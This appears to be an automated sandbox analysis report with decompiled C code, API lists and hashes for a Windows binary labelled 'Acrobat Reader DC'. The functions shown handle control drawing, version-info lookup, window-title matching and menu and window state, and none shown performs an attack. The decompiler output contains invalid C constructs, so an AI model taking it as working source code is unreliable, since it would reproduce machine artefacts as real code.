				_t93 = SendMessageW( *_a8, 0xe, 0, 0) + 1;
				_v20 = _t93;
				_push( ~(0 | _t159 > 0x00000000) | _t93 * 0x00000002);
				_t95 = E004115D7(_t149, _t152, _t159);
				_v28 = _t95;
				GetWindowTextW( *_a8, _t95, _v20);
				if(_v24 != 0) {
					_v60.top =  *(_t149 + 0x20);
					_v60 =  *(_t149 + 0x1c);
					_v60.right =  *(_t149 + 0x24);
					_v60.bottom =  *(_t149 + 0x28);
					InflateRect( &_v60, 0xfffffffd, 0xfffffffd);
					DrawFocusRect(_t152,  &_v60);
				}
				if(_v16 != 0) {
					SetTextColor(_t152, GetSysColor(0x11));
				}
				_t150 = _v28;
				DrawTextW(_t152, _t150, 0xffffffff,  &_v60, _v12);
				_push(_t150);
				E004111DC();
				SelectObject(_t152, _v32);
				DeleteObject(_a4);
				SelectObject(_t152, _v36);
				DeleteObject(_v40);
				SetTextColor(_t152, _v8);
				SetBkColor(_t152, _v44);
				return 1;
			}































                                  0x004308f8
                                  0x004308fb
                                  0x004308fe
                                  0x00430906
                                  0x00430909
                                  0x0043090c
                                  0x0043090f
                                  0x00430926
                                  0x00430929
                                  0x0043092c
                                  0x0043092f
                                  0x00430933
                                  0x00430933
                                  0x0043093b
                                  0x00430911
                                  0x0043091b
                                  0x00430921
                                  0x00430921
                                  0x00430941
                                  0x00430944
                                  0x0043094a
                                  0x00430968
                                  0x0043096b
                                  0x0043094c
                                  0x00430956
                                  0x00430959
                                  0x00430959
                                  0x00430972
                                  0x00430975
                                  0x00430981
                                  0x00430977
                                  0x00430979
                                  0x00430979
                                  0x0043098b
                                  0x00430999
                                  0x004309a3
                                  0x004309b1
                                  0x004309bc
                                  0x004309c4
                                  0x004309c7
                                  0x004309d3
                                  0x004309d6
                                  0x004309d9
                                  0x004309f4
                                  0x00430a02
                                  0x00430a0f
                                  0x00430a14
                                  0x00430a16
                                  0x00430a16
                                  0x00430a2f
                                  0x00430a32
                                  0x00430a43
                                  0x00430a44
                                  0x00430a54
                                  0x00430a5a
                                  0x00430a64
                                  0x00430a71
                                  0x00430a74
                                  0x00430a80
                                  0x00430a83
                                  0x00430a86
                                  0x00430a91
                                  0x00430a91
                                  0x00430a9b
                                  0x00430aa7
                                  0x00430aa7
                                  0x00430ab0
                                  0x00430abc
                                  0x00430ac2
                                  0x00430ac3
                                  0x00430ad0
                                  0x00430adc
                                  0x00430ae3
                                  0x00430ae9
                                  0x00430af0
                                  0x00430afb
                                  0x00430b0c

                                  APIs
                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • GetSysColor.USER32(00000012), ref: 00430933
                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                  • GetSysColor.USER32(00000011), ref: 00430979
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  • GetWindowTextW.USER32 ref: 00430A5A
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                  • DrawFocusRect.USER32 ref: 00430A91
                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 1582027408-0
                                  • Opcode ID: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                  • Opcode Fuzzy Hash: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00433A13(short* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				unsigned int _v16;
				int _v20;
				int _v24;
				void* __edi;
				void* __esi;
				int _t39;
				int _t40;
				int _t42;
				int _t46;
				int _t61;
				int _t64;
				void* _t75;
				void* _t85;
				unsigned int _t86;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t105;
				int _t109;
				short* _t110;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t125;
				void* _t126;

				_t116 = _t115 - 0x14;
				_t101 = _a12;
				_t109 = GetFileVersionInfoSizeW(_a4,  &_v24);
				if(_t109 != 0) {
					_push(_t109);
					_t75 = E004115D7(_t101, _t109, __eflags);
					GetFileVersionInfoW(_a4, 0, _t109, _t75);
					_push( ~(0 | __eflags > 0x00000000) | (E004111C1(_t101) + 0x0000001a) * 0x00000002);
					_t110 = E004115D7(_t101, _t109, __eflags);
					E00411567(_t110, "\\");
					_t39 = E0041313C(_t101, "\\");
					_t118 = _t116 + 0x1c;
					__eflags = _t39;
					if(_t39 != 0) {
						E00411536(_t110, L"StringFileInfo\\");
						_t61 = E004134BD(_t101, "\\");
						_t125 = _t118 + 0x10;
						__eflags = _t61;
						if(_t61 != 0) {
							E00411536(_t110, _t101);
							_t118 = _t125 + 8;
						} else {
							_t64 = VerQueryValueW(_t75, L"\\VarFileInfo\\Translation",  &_v12,  &_v20);
							__eflags = _t64;
							if(_t64 == 0) {
								E00411536(_t110, L"04090000");
								_t126 = _t125 + 8;
							} else {
								_t14 =  &(_t110[0x10]); // 0x20
								_v16 =  *_v12;
								E00432E88( *_v12, 0, _t14, 4);
								_t17 =  &(_t110[0x14]); // 0x28
								E00432E88(_v16 >> 0x10, 0, _t17, 4);
								_t126 = _t125 + 0x20;
							}
							E00411536(_t110, "\\");
							E00411536(_t110, _t101);
							_t118 = _t126 + 0x10;
						}
					}
					_t40 = E004114AB(_t101, _t101, L"DefaultLangCodepage");
					__eflags = _t40;
					if(_t40 != 0) {
						_t42 = VerQueryValueW(_t75, _t110,  &_v8,  &_v20);
						__eflags = _t42;
						if(_t42 == 0) {
							_push(_t75);
							E004111DC();
							_push(_t110);
							E004111DC();
							__eflags = 0;
							return 0;
						} else {
							_t46 = E0041313C(_t101, "\\");
							__eflags = _t46;
							if(_t46 != 0) {
								_t103 = _a8;
								E00412FBA(_t103, _v8, 0x200);
								__eflags = 0;
								 *((short*)(_t103 + 0x400)) = 0;
							} else {
								_t85 = _v8;
								_t86 =  *(_t85 + 0xc);
								_push(_t86 & 0x0000ffff);
								_push(_t86 >> 0x10);
								_push( *(_t85 + 8) & 0x0000ffff);
								E0041329B(_a8, _a8, L"%u.%u.%u.%u",  *(_t85 + 8) >> 0x10);
							}
							_push(_t75);
							E004111DC();
							_push(_t110);
							E004111DC();
							return 1;
						}
					} else {
						_t105 = _a8;
						_t19 =  &(_t110[0x10]); // 0x20
						E00412FBA(_t105, _t19, 8);
						__eflags = 0;
						_push(_t75);
						 *((short*)(_t105 + 0x10)) = 0;
						E004111DC();
						_push(_t110);
						E004111DC();
						return 1;
					}
				} else {
					return 0;
				}
			}





























                                  0x00433a19
                                  0x00433a1e
                                  0x00433a2c
                                  0x00433a30
                                  0x00433a3b
                                  0x00433a47
                                  0x00433a4e
                                  0x00433a6d
                                  0x00433a73
                                  0x00433a7b
                                  0x00433a86
                                  0x00433a8b
                                  0x00433a8e
                                  0x00433a90
                                  0x00433a9c
                                  0x00433aa7
                                  0x00433aac
                                  0x00433aaf
                                  0x00433ab1
                                  0x00433b21
                                  0x00433b26
                                  0x00433ab3
                                  0x00433ac1
                                  0x00433ac7
                                  0x00433ac9
                                  0x00433b00
                                  0x00433b05
                                  0x00433acb
                                  0x00433ad2
                                  0x00433ad9
                                  0x00433adc
                                  0x00433ae6
                                  0x00433af0
                                  0x00433af5
                                  0x00433af5
                                  0x00433b0e
                                  0x00433b15
                                  0x00433b1a
                                  0x00433b1a
                                  0x00433ab1
                                  0x00433b2f
                                  0x00433b37
                                  0x00433b39
                                  0x00433b72
                                  0x00433b78
                                  0x00433b7a
                                  0x00433bf0
                                  0x00433bf1
                                  0x00433bf6
                                  0x00433bf7
                                  0x00433c01
                                  0x00433c07
                                  0x00433b7c
                                  0x00433b82
                                  0x00433b8a
                                  0x00433b8c
                                  0x00433bbd
                                  0x00433bc7
                                  0x00433bcf
                                  0x00433bd1
                                  0x00433b8e
                                  0x00433b8e
                                  0x00433b94
                                  0x00433b9a
                                  0x00433ba1
                                  0x00433ba5
                                  0x00433bb0
                                  0x00433bb5
                                  0x00433bd8
                                  0x00433bd9
                                  0x00433bde
                                  0x00433bdf
                                  0x00433bef
                                  0x00433bef
                                  0x00433b3b
                                  0x00433b3b
                                  0x00433b40
                                  0x00433b45
                                  0x00433b4a
                                  0x00433b4c
                                  0x00433b4d
                                  0x00433b51
                                  0x00433b56
                                  0x00433b57
                                  0x00433b67
                                  0x00433b67
                                  0x00433a32
                                  0x00433a39
                                  0x00433a39

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 1503153545-1459072770
                                  • Opcode ID: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                  • Opcode Fuzzy Hash: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00469296(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
				char _v24;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t39;
				char* _t53;
				void* _t61;
				void* _t62;
				intOrPtr* _t64;
				void* _t77;

				_t77 = __fp0;
				_t61 = __edx;
				E0040BC70( &_v24, __eflags);
				_t58 =  &_v40;
				E0040BC70( &_v40, __eflags);
				_t64 = _a4;
				if(E00436565(_t64) != 0 || E004114AB(_t62,  *_t64, L"LAST") == 0) {
					_t53 = L"[LAST";
					goto L14;
				} else {
					if(E004114AB(_t62,  *_t64, L"ACTIVE") != 0) {
						_t33 = E0041341F( *_t64, L"HANDLE=", 7);
						__eflags = _t33;
						if(_t33 != 0) {
							_t35 = E0041341F( *_t64, L"REGEXP=", 7);
							__eflags = _t35;
							if(_t35 != 0) {
								_t37 = E0041341F( *_t64, L"CLASSNAME=", 0xa);
								__eflags = _t37;
								if(_t37 != 0) {
									_t39 = E004114AB(_t62,  *_t64, L"ALL");
									__eflags = _t39;
									if(_t39 == 0) {
										_t53 = L"[ALL";
										goto L14;
									}
								} else {
									E00402160( &_v24, L"[CLASS:", _t61, _t62);
									_push(0xffffffff);
									_push(0xa);
									goto L10;
								}
							} else {
								E00402160( &_v24, L"[REGEXPTITLE:", _t61, _t62);
								_push(0xffffffff);
								_push(7);
								goto L10;
							}
						} else {
							E00402160( &_v24, L"[HANDLE:", _t61, _t62);
							_push(0xffffffff);
							_push(7);
							L10:
							_push( &_v56);
							_push(_t64);
							E0040E0A0( &_v40, E0046150F(__eflags));
							_t58 =  &_v56;
							E00402250( &_v56);
							E00461321(__eflags, _t77,  &_v40);
							E0040BD50( &_v24, _t77,  &_v40);
							_t64 = _a4;
							goto L15;
						}
					} else {
						_t53 = L"[ACTIVE";
						L14:
						E00402160( &_v24, _t53, _t61, _t62);
						L15:
						E0040D200( &_v24, _t58, "]", _t77);
						E0040E0A0(_t64,  &_v24);
					}
				}
				E00402250( &_v40);
				return E00402250( &_v24);
			}


















                                  0x00469296
                                  0x00469296
                                  0x004692a2
                                  0x004692a7
                                  0x004692aa
                                  0x004692af
                                  0x004692ba
                                  0x004693b9
                                  0x00000000
                                  0x004692d8
                                  0x004692ea
                                  0x00469300
                                  0x00469308
                                  0x0046930a
                                  0x00469329
                                  0x00469331
                                  0x00469333
                                  0x00469352
                                  0x0046935a
                                  0x0046935c
                                  0x004693a6
                                  0x004693ae
                                  0x004693b0
                                  0x004693b2
                                  0x00000000
                                  0x004693b2
                                  0x0046935e
                                  0x00469366
                                  0x0046936b
                                  0x0046936d
                                  0x00000000
                                  0x0046936d
                                  0x00469335
                                  0x0046933d
                                  0x00469342
                                  0x00469344
                                  0x00000000
                                  0x00469344
                                  0x0046930c
                                  0x00469314
                                  0x00469319
                                  0x0046931b
                                  0x0046936f
                                  0x00469372
                                  0x00469373
                                  0x0046937d
                                  0x00469382
                                  0x00469385
                                  0x0046938b
                                  0x00469394
                                  0x00469399
                                  0x00000000
                                  0x00469399
                                  0x004692ec
                                  0x004692ec
                                  0x004693be
                                  0x004693c1
                                  0x004693c6
                                  0x004693ce
                                  0x004693d7
                                  0x004693d7
                                  0x004692ea
                                  0x004693df
                                  0x004693f2

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$__wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                  • API String ID: 790654849-32604322
                                  • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                  • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0044870C(void* __eflags, intOrPtr _a4, signed int _a8) {
				int _v20;
				void* _v28;
				intOrPtr _v56;
				int _v60;
				long _v64;
				void* _v68;
				int _v100;
				signed int _v104;
				long _v108;
				int _v112;
				void* _v116;
				signed int _v120;
				struct HWND__** _v124;
				struct HWND__* _v128;
				signed char _v132;
				signed int _v133;
				signed int _v140;
				int _v148;
				intOrPtr _t172;
				signed int _t176;
				void* _t178;
				signed char _t179;
				signed char _t181;
				signed int _t198;
				signed char _t199;
				signed char _t201;
				int _t209;
				signed int _t212;
				struct HWND__* _t215;
				signed int _t221;
				struct HWND__* _t226;
				intOrPtr* _t229;

				_t198 = _a8;
				if(E00441AF5(0x4a8630, _a4,  &_v120,  &_v132) != 0) {
					_t172 =  *0x4a8690; // 0x0
					_t209 =  *0x4a86a4; // 0xa51ad0
					_t224 = _v132;
					_t229 =  *((intOrPtr*)( *((intOrPtr*)(_t209 + _v132 * 4))));
					_v124 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + _v120 * 4))));
					_v128 =  *_t229;
					_v133 =  *((intOrPtr*)(_t229 + 0x88));
					_v140 = 0;
					if(_t198 < 0) {
						_t198 = 0;
					}
					_t176 = _t198 & 0x00000100;
					_v132 = _t176;
					if(_t176 != 0) {
						E004415D1(_v120, _t224);
						_v148 = 1;
					}
					if((_t198 & 0x00000800) != 0) {
						SetWindowPos(_v128, 0, 0, 0, 0, 0, 0x13);
						_v140 = 1;
					}
					_t178 = (_v133 & 0x000000ff) + 0xfffffff7;
					if(_t178 > 0x11) {
						L62:
						_t199 = _t198 & 0x000010f8;
						_t179 = _t199;
						_v132 = _t179;
						if(_t199 > 0) {
							_t226 = _v128;
							_t201 = 0;
							_v140 = 1;
							if(_t179 < 0) {
								_t201 = 0xc0;
								EnableWindow(_t226, 0);
								_t179 = _v132;
							}
							if((_t179 & 0x00000040) != 0) {
								_t201 = 0xc0;
								EnableWindow(_t226, 1);
								_t179 = _v132;
							}
							_t221 = _t179 & 0x00000020;
							if(_t221 != 0) {
								_t201 = _t201 + 0x30;
							}
							_t212 = _t179 & 0x00000010;
							_v132 = _t212;
							if(_t212 != 0) {
								_t201 = _t201 + 0x30;
							}
							if((_t179 & 0x00000008) != 0) {
								_t201 = _t201 + 0x1008;
							}
							if((_t179 & 0x00001000) != 0) {
								_t201 = _t201 + 0x1008;
							}
							_t181 =  *((intOrPtr*)(_t229 + 0x8b));
							 *(_t229 + 0x8a) =  !_t201 &  *(_t229 + 0x8a) | _t179;
							if(_t181 == 0xff) {
								L78:
								if(_t221 != 0) {
									ShowWindow(_t226, 0);
								}
								if(_v132 != 0) {
									ShowWindow(_t226, 4);
									if(_v133 == 0x1a && ( *(_t229 + 0x8a) & 0x00000040) != 0) {
										EnableWindow(_t226, 1);
									}
								}
								E00430B87(_v124, _t229, 1);
							} else {
								_t215 = _v124[0x65];
								if((_t181 & 0x000000ff) == _t215 || _t215 == 0xffffffff) {
									goto L78;
								}
							}
						}
						goto L85;
					} else {
						switch( *((intOrPtr*)(( *(_t178 + 0x448d50) & 0x000000ff) * 4 +  &M00448D24))) {
							case 0:
								__eax = __ebx & 0x00000007;
								if(__eax == 0) {
									__ecx = _v128;
									_push(0);
									_push(0);
									_push(0x466);
									_push(_v128);
									goto L60;
								} else {
									if(__eax == 0) {
										__eax = _v128;
										_push(0xffff0000);
										_push(0xffffffff);
										_push(0x465);
										_push(_v128);
										L60:
										if(SendMessageW() != 0) {
											goto L61;
										}
									} else {
										__edx = _v128;
										__eax = SendMessageW(_v128, 0x467, 0, 0);
										goto L61;
									}
								}
								goto L62;
							case 1:
								if((__bl & 0x00000010) != 0) {
									__ecx = _v124;
									__eax =  *(__esi + 0x8b) & 0x000000ff;
									if( *((char*)(__ecx + 0x19c)) != 0) {
										__edx =  *(__ecx + 0x198);
										 *(__ecx + 0x194) =  *(__ecx + 0x198);
									}
									__edi = __ecx;
									__eax =  *(__esi + 0x8b) & 0x000000ff;
									 *(__edi + 0x198) =  *(__esi + 0x8b) & 0x000000ff;
									goto L61;
								}
								goto L62;
							case 2:
								goto L1;
							case 3:
								__ecx =  *(__esi + 8);
								__eax =  &_v116;
								_v140 = 0;
								_v116 = 0x30;
								_v112 = 1;
								if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) == 0 || (__bl & 0x00000020) != 0) {
									goto L1;
								} else {
									if(__bl < 0) {
										_v140 = 3;
									}
									if((__bl & 0x00000001) != 0) {
										_v140 = _v140 | 0x00000008;
									}
									if(_v132 != 0) {
										_v140 = _v140 | 0x00000080;
									}
									if((_v104 & 0x00000008) != 0 && (__bl & 0x00000004) == 0) {
										_v140 = _v140 | 0x00000008;
									}
									__ecx =  *(__esi + 8);
									__edx = _v140;
									__eax =  &_v116;
									_v104 = _v140;
									__eax = SetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116);
									if((__ebx & 0x00000200) == 0) {
										__ecx =  *(__esi + 8);
										__eax =  &_v116;
										if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) != 0 && (_v104 & 0x00001000) != 0) {
											_push(0);
											_push(0xffffffff);
											goto L51;
										}
									} else {
										_push(0);
										_push(__edi);
										L51:
										__edx =  *(__esi + 8);
										__eax = SetMenuDefaultItem( *(__esi + 8), ??, ??);
									}
									__eax = _v124;
									__ecx =  *_v124;
									__eax = DrawMenuBar( *_v124);
									goto L61;
								}
								goto L97;
							case 4:
								__ecx =  *(__esi + 0x30);
								__eax = GetWindowLongW( *(__esi + 0x30), 0xfffffff0);
								__edx =  *(__esi + 0xc);
								__bl = __bl & 0x00000001;
								__bl & 0x00000001 =  ~(__bl & 0x00000001);
								asm("sbb eax, eax");
								__eax =  ~(__bl & 0x00000001) & 0x00001000;
								__eax = ( ~(__bl & 0x00000001) & 0x00001000) + 0x1000;
								_v64 =  *(__esi + 0xc);
								_v68 = 8;
								_v56 = 0xf010;
								_v60 = __eax;
								if((__ebx & 0x00000200) != 0) {
									_v60 = __eax;
								}
								__edx =  *(__esi + 0x30);
								__edi = SendMessageW;
								__ecx =  &_v68;
								__eax = SendMessageW( *(__esi + 0x30), 0x113f, 0,  &_v68);
								if((__ebx & 0x00000400) != 0) {
									__eax =  *(__esi + 0xc);
									__ecx =  *(__esi + 0x30);
									__eax = SendMessageW( *(__esi + 0x30), 0x1102, 2,  *(__esi + 0xc));
								}
								if(_v132 != 0) {
									__edx =  *(__esi + 0x30);
									E00441B7C(0x4a8630,  *(__esi + 0x30)) = _v128;
									__eax = E004415D1(_v128, _v128);
									__ecx =  *(__esi + 0xc);
									__edx =  *(__esi + 0x30);
									__eax = SendMessageW( *(__esi + 0x30), 0x110b, 9,  *(__esi + 0xc));
								}
								goto L61;
							case 5:
								__esi =  *(__esi + 0x30);
								__edx =  &_v28;
								_v140 = 0;
								_v28 = 1;
								_v20 = __edi;
								__edi = SendMessageW(__esi, 0x1053, 0xffffffff,  &_v28);
								if(__edi == 0xffffffff) {
									goto L1;
								} else {
									_v112 = __edi;
									_v108 = 0;
									_v116 = 8;
									__eax = GetWindowLongW(__esi, 0xffffffec);
									if((__al & 0x00000004) != 0 && (__bl & 0x00000005) != 0) {
										__ebx - 1 =  ~(__ebx - 1);
										__ecx =  &_v116;
										asm("sbb eax, eax");
										 ~(__ebx - 1) & 0xfffff000 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
										_v100 = 0xf000;
										_v104 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
										_v140 = SendMessageW(__esi, 0x104c, 0,  &_v116);
									}
									if((__ebx & 0x00002100) == 0) {
										L85:
										return _v140;
									} else {
										if(_v132 != 0) {
											_v104 = 0xffffffff;
										}
										if((__ebx & 0x00002000) != 0) {
											_v104 = 0;
										}
										__edx =  &_v116;
										_v100 = 3;
										__eax = SendMessageW(__esi, 0x102b, __edi,  &_v116);
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								}
								goto L97;
							case 6:
								__eax = 3;
								if( *0x4a86b4 >= 3) {
									do {
										__ecx =  *0x4a86a4;
										__ecx =  *( *0x4a86a4 + __eax * 4);
										if( *__ecx == 0) {
											goto L20;
										} else {
											__ecx =  *__ecx;
											__edx =  *(__ecx + 4);
											__edi = _v124;
											if( *(__ecx + 4) != _v124[1] ||  *((char*)(__ecx + 0x88)) != 3 || __ecx !=  *(__esi + 0x30)) {
												goto L20;
											} else {
												__cl =  *((intOrPtr*)(__esi + 0x8a));
												if((__bl & __cl) == 0 && (__cl & 0x00000010) != 0) {
													__edx =  *0x4a86a4;
													__eax =  *( *0x4a86a4 + __eax * 4);
													__eax =  *__eax;
													__ecx =  *(__eax + 0x86);
													__edx =  *(__eax + 0x84);
													__ecx =  *((short*)(__eax + 0x82));
													__edx =  *((short*)(__eax + 0x80));
													__eax = MoveWindow(__eax, __edx, __ecx,  *(__eax + 0x84),  *(__eax + 0x86), 0);
													__ecx =  *(__esi + 0x30);
													__edx = _v128;
													__eax = SendMessageW(_v128, 0x469,  *(__esi + 0x30), 0);
												}
											}
										}
										goto L62;
										L20:
										__eax = __eax + 1;
									} while (__eax <=  *0x4a86b4);
								}
								goto L62;
							case 7:
								if((__ebx & 0x00000200) != 0) {
									__edx = _v124;
									 *_v124 = SendMessageW( *_v124, 0x401, __edi, 0);
									if(GetFocus() == __esi->i) {
										__ecx = _v120;
										__eax = E004415D1(_v120, __edi);
									}
									goto L61;
								}
								goto L62;
							case 8:
								__eax = __ebx;
								__eax = __ebx & 0x00000007;
								if(__eax != 0) {
									__edx = _v128;
									__eax = SendMessageW(_v128, 0xf1, __eax, 0);
									goto L61;
								}
								goto L62;
							case 9:
								_t190 = _t198 & 0x00000007;
								if((_t198 & 0x00000007) != 0) {
									E00440D98(_t224, _t190 & 0x00000003);
									L61:
									_v140 = 1;
								}
								goto L62;
							case 0xa:
								goto L62;
						}
					}
				} else {
					L1:
					return 0;
				}
				L97:
			}



































                                  0x0044871c
                                  0x00448738
                                  0x00448745
                                  0x00448753
                                  0x00448759
                                  0x00448760
                                  0x00448768
                                  0x0044876e
                                  0x00448772
                                  0x00448776
                                  0x00448780
                                  0x00448782
                                  0x00448782
                                  0x00448786
                                  0x0044878b
                                  0x0044878f
                                  0x00448797
                                  0x0044879c
                                  0x0044879c
                                  0x004487aa
                                  0x004487bd
                                  0x004487c3
                                  0x004487c3
                                  0x004487d0
                                  0x004487d6
                                  0x00448b30
                                  0x00448b30
                                  0x00448b36
                                  0x00448b38
                                  0x00448b3c
                                  0x00448b42
                                  0x00448b46
                                  0x00448b48
                                  0x00448b52
                                  0x00448b57
                                  0x00448b5c
                                  0x00448b62
                                  0x00448b62
                                  0x00448b68
                                  0x00448b6d
                                  0x00448b72
                                  0x00448b78
                                  0x00448b78
                                  0x00448b7e
                                  0x00448b81
                                  0x00448b83
                                  0x00448b83
                                  0x00448b88
                                  0x00448b8b
                                  0x00448b8f
                                  0x00448b91
                                  0x00448b91
                                  0x00448b96
                                  0x00448b98
                                  0x00448b98
                                  0x00448ba3
                                  0x00448ba5
                                  0x00448ba5
                                  0x00448bb5
                                  0x00448bbb
                                  0x00448bc3
                                  0x00448bdb
                                  0x00448be3
                                  0x00448be8
                                  0x00448be8
